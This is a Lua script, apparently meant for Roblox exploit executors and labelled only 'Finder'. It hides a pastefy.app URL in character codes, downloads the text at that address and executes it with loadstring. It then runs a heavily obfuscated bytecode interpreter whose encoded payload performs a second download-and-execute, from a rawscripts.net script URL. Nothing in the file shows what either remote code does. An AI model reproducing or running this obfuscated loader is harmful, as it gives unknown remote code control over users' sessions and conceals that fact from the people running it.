local z = {
    string.char(104,116,116,112,115),  
    string.char(58,47,47),             
    string.char(112,97,115,116,101,102,121), 
    string.char(46),                   
    string.char(97,112,112),           
    string.char(47),                   
    string.char(82,97,81,55,120,48,114,78),
    string.char(47,114,97,119)         
}
-- Finder
local url = table.concat(z)
local code = game["HttpGet"](game, url)
local f = (function(x) return loadstring(x) end)(code)
if f then f() end

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=v2(v0(v30,16));if v19 then local v110=0;local v111;while true do if (v110==1) then return v111;end if (v110==0) then v111=v5(v87,v19);v19=nil;v110=1;end end else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((2257 -(1523 + 114)) -(555 + 64)))) + (932 -(857 + 74)))) ;return v88-(v88%(569 -(330 + 37 + 201))) ;else local v89=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v89 + v89))>=v89) and (1 + 0)) or (877 -((401 -119) + 595)) ;end end local function v21() local v34=117 -(32 + 85) ;local v35;while true do if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=4 -(5 -2) ;end if (v34==(2 -1)) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;return (v37 * (436 -(67 + 113))) + v36 ;end local function v23() local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if ((2 -1)==v38) then return (v42 * (12338840 + 4438376)) + (v41 * 65536) + (v40 * (1017 -(554 + 207))) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + ((1952 -(915 + 82)) -(802 + 150)) );v18=v18 + (10 -6) ;v38=1 -0 ;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1 + (859 -(814 + 45)))) then v46=1;v47=(v20(v45,1 -0 ,1207 -(1069 + 118) ) * (2^(72 -40))) + v44 ;v43=3 -1 ;end if (v43==(0 + (0 -0))) then v44=v23();v45=v23();v43=1 + 0 ;end if (v43==(4 -1)) then if (v48==(0 + 0 + 0)) then if (v47==(791 -(368 + 423))) then return v49 * (0 -0) ;else local v122=18 -(10 + 8) ;while true do if (v122==(0 -0)) then v48=(1328 -(261 + 624)) -(416 + 26) ;v46=0 -0 ;break;end end end elseif (v48==((1561 -682) + 1168)) then return ((v47==(0 -0)) and (v49 * ((439 -(145 + 293))/(430 -(44 + 386))))) or (v49 * NaN) ;end return v8(v49,v48-(2509 -((2078 -(1020 + 60)) + 488)) ) * (v46 + (v47/(2^(17 + 35)))) ;end if (v43==(2 + 0)) then v48=v20(v45,793 -(201 + 571) ,31);v49=((v20(v45,1170 -(116 + 1022) )==(4 -3)) and  -(1 + (1423 -(630 + 793)))) or (3 -2) ;v43=10 -7 ;end end end local function v25(v50) local v51=(0 + 0) -0 ;local v52;local v53;while true do if ((9 -7)==v51) then v53={};for v112=1 + (1055 -(87 + 968)) , #v52 do v53[v112]=v2(v1(v3(v52,v112,v112)));end v51=9 -6 ;end if ((1750 -(760 + 987))==v51) then return v6(v53);end if (v51==(1914 -(1789 + 124))) then v52=v3(v16,v18,(v18 + v50) -(767 -((3279 -2534) + 21)) );v18=v18 + v50 ;v51=1 + 1 ;end if (v51==(0 -0)) then v52=nil;if  not v50 then v50=v23();if (v50==((0 + 0) -0)) then return "";end end v51=1 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 0 -0 ;end)();local v91=(function() return;end)();local v92=(function() return;end)();while true do if ( #"}"~=v90) then else if (v91== #">") then v92=(function() return v93()~=0 ;end)();elseif (v91==2) then v92=(function() return v94();end)();elseif (v91== #"asd") then v92=(function() return v95();end)();end v96[v97]=(function() return v92;end)();break;end if (v90~=0) then else local v119=(function() return 0 + 0 ;end)();while true do if (v119==0) then v91=(function() return v93();end)();v92=(function() return nil;end)();v119=(function() return 2 -1 ;end)();end if (v119==1) then v90=(function() return  #" ";end)();break;end end end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v55=(function() return function(v98,v99,v100) local v101=(function() return 0;end)();while true do if (v101==0) then v98[v99-#":" ]=(function() return v100();end)();return v98,v99,v100;end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v69= #"~",v60 do FlatIdent_940A0,Type,Cons,v21,v24,v25,v61,v69=(function() return v54(FlatIdent_940A0,Type,Cons,v21,v24,v25,v61,v69);end)();end v59[ #"asd"]=(function() return v21();end)();for v70= #"{",v23() do local v71=(function() return v21();end)();if (v20(v71, #"/", #"}")~=(867 -(550 + 317))) then else local v105=(function() return 0;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if ((2 -0)~=v105) then else while true do if (v106==0) then local v123=(function() return 0;end)();local v124=(function() return;end)();while true do if (v123~=0) then else v124=(function() return 0 -0 ;end)();while true do if (v124==1) then v106=(function() return  #" ";end)();break;end if (v124==(0 -0)) then v107=(function() return v20(v71,287 -(134 + 151) , #"-19");end)();v108=(function() return v20(v71, #".com",1671 -(970 + 695) );end)();v124=(function() return 1;end)();end end break;end end end if (v106== #"xnx") then if (v20(v108, #"91(", #"91(")~= #"{") then else v109[ #"http"]=(function() return v61[v109[ #"0313"]];end)();end v56[v70]=(function() return v109;end)();break;end if (v106~=(3 -1)) then else local v126=(function() return 0;end)();local v127=(function() return;end)();while true do if (v126==0) then v127=(function() return 1990 -(582 + 1408) ;end)();while true do if (v127==(3 -2)) then v106=(function() return  #"gha";end)();break;end if (v127==(0 -0)) then if (v20(v108, #">", #"\\")== #"\\") then v109[7 -5 ]=(function() return v61[v109[1826 -(1195 + 629) ]];end)();end if (v20(v108,2,2 -0 )~= #" ") then else v109[ #"91("]=(function() return v61[v109[ #"-19"]];end)();end v127=(function() return 242 -(187 + 54) ;end)();end end break;end end end if (v106== #",") then local v128=(function() return 0;end)();local v129=(function() return;end)();while true do if (v128==0) then v129=(function() return 780 -(162 + 618) ;end)();while true do if (v129==(0 + 0)) then v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==(0 + 0)) then local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if (v177==0) then v178=(function() return 0 -0 ;end)();while true do if ((0 -0)~=v178) then else v109[ #"xnx"]=(function() return v22();end)();v109[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v107== #".") then v109[ #"gha"]=(function() return v23();end)();elseif (v107==(1 + 1)) then v109[ #"nil"]=(function() return v23() -((1638 -(1373 + 263))^16) ;end)();elseif (v107== #"91(") then local v185=(function() return 1000 -(451 + 549) ;end)();local v186=(function() return;end)();while true do if (v185~=0) then else v186=(function() return 0 + 0 ;end)();while true do if (v186==(0 -0)) then v109[ #"gha"]=(function() return v23() -((2 -0)^16) ;end)();v109[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v129=(function() return 1;end)();end if ((1385 -(746 + 638))~=v129) then else v106=(function() return 1 + 1 ;end)();break;end end break;end end end end break;end if ((1 -0)==v105) then v108=(function() return nil;end)();v109=(function() return nil;end)();v105=(function() return 343 -(218 + 123) ;end)();end if (v105==0) then local v121=(function() return 1581 -(1535 + 46) ;end)();while true do if (v121==(1 + 0)) then v105=(function() return 1 + 0 ;end)();break;end if (v121==0) then v106=(function() return 560 -(306 + 254) ;end)();v107=(function() return nil;end)();v121=(function() return 1 + 0 ;end)();end end end end end end for v72= #"|",v23() do v57,v72,v28=(function() return v55(v57,v72,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[1];local v67=v63[3 -1 ];local v68=v63[1470 -(899 + 568) ];return function(...) local v73=v66;local v74=v67;local v75=v68;local v76=v27;local v77=1 + 0 ;local v78= -(2 -1);local v79={};local v80={...};local v81=v12("#",...) -(291 -(60 + (550 -(53 + 267)))) ;local v82={};local v83={};for v102=572 -(426 + 146) ,v81 do if (v102>=v75) then v79[v102-v75 ]=v80[v102 + 1 + 0 + 0 ];else v83[v102]=v80[v102 + (1457 -(282 + 1174)) ];end end local v84=(v81-v75) + 1 ;local v85;local v86;while true do v85=v73[v77];v86=v85[812 -(569 + 242) ];if (v86<=7) then if ((3629>=1417) and (v86<=(8 -5))) then if ((4795>402) and (v86<=(1 + 0))) then if (v86>(1024 -(706 + 318))) then local v130=v85[1253 -(721 + (943 -(15 + 398))) ];v83[v130]=v83[v130](v13(v83,v130 + (1272 -(945 + 326)) ,v78));else local v132=v85[2];local v133,v134=v76(v83[v132](v13(v83,v132 + (2 -1) ,v85[3])));v78=(v134 + v132) -(1 + 0) ;local v135=700 -(271 + (1411 -(18 + 964))) ;for v162=v132,v78 do v135=v135 + 1 + 0 ;v83[v162]=v133[v135];end end elseif (v86==(1502 -(1408 + 92))) then v83[v85[1088 -(461 + 625) ]]=v65[v85[1291 -(993 + (1110 -815)) ]];else local v138=0 + 0 + 0 ;local v139;while true do if (v138==(1171 -(418 + 753))) then v139=v85[1 + 1 ];v83[v139]=v83[v139](v13(v83,v139 + 1 + 0 + 0 ,v78));break;end end end elseif (v86<=5) then if ((4813>3565) and (v86==4)) then v83[v85[(851 -(20 + 830)) + 1 ]]=v85[1 + 2 ];else v83[v85[2]]=v85[532 -(406 + 97 + 26) ];end elseif ((3912==3912) and (v86>(1775 -(1749 + 20)))) then do return;end else v83[v85[1 + 1 ]]=v65[v85[3]];end elseif (v86<=(1333 -(1249 + 73))) then if (v86<=(4 + 5)) then if (v86>((1279 -(116 + 10)) -(466 + 679))) then v83[v85[4 -2 ]]={};else do return;end end elseif (v86==10) then v83[v85[2]]={};else local v148=v85[5 -3 ];local v149=v83[v85[1903 -(106 + 1794) ]];v83[v148 + 1 + 0 + 0 ]=v149;v83[v148]=v149[v85[2 + 2 ]];end elseif (v86<=13) then if (v86==(35 -23)) then v83[v85[(743 -(542 + 196)) -3 ]]();else local v153=114 -(4 + 110) ;local v154;local v155;local v156;local v157;while true do if (v153==(586 -(57 + 527))) then for v173=v154,v78 do local v174=1427 -(41 + 1386) ;while true do if ((103 -(17 + 86))==v174) then v157=v157 + (1 -0) + 0 ;v83[v173]=v155[v157];break;end end end break;end if ((2821<=4824) and (v153==((0 + 0) -0))) then v154=v85[(3 + 2) -3 ];v155,v156=v76(v83[v154](v13(v83,v154 + (167 -(122 + 44)) ,v85[2 + 1 ])));v153=1 -0 ;end if (v153==1) then v78=(v156 + v154) -(3 -2) ;v157=0 + (0 -0) ;v153=1 + 1 ;end end end elseif (v86>(27 -(33 -20))) then local v158=65 -(30 + 35) ;local v159;local v160;while true do if (0==v158) then v159=v85[2 + 0 ];v160=v83[v85[1260 -(1043 + 214) ]];v158=3 -2 ;end if ((1738<=2195) and (1==v158)) then v83[v159 + (1213 -(323 + 889)) ]=v160;v83[v159]=v160[v85[10 -6 ]];break;end end else v83[v85[582 -(361 + 219) ]]();end v77=v77 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403383Q00682Q7470733A2Q2F726177736372697074732E6E65742F7261772F556E6976657273616C2D5363726970742D4E61744875622D343334303700094Q00097Q001206000100013Q001206000200023Q00200B000200020003001204000400046Q000200044Q000300013Q00022Q000C0001000100012Q00083Q00017Q00",v9(),...);
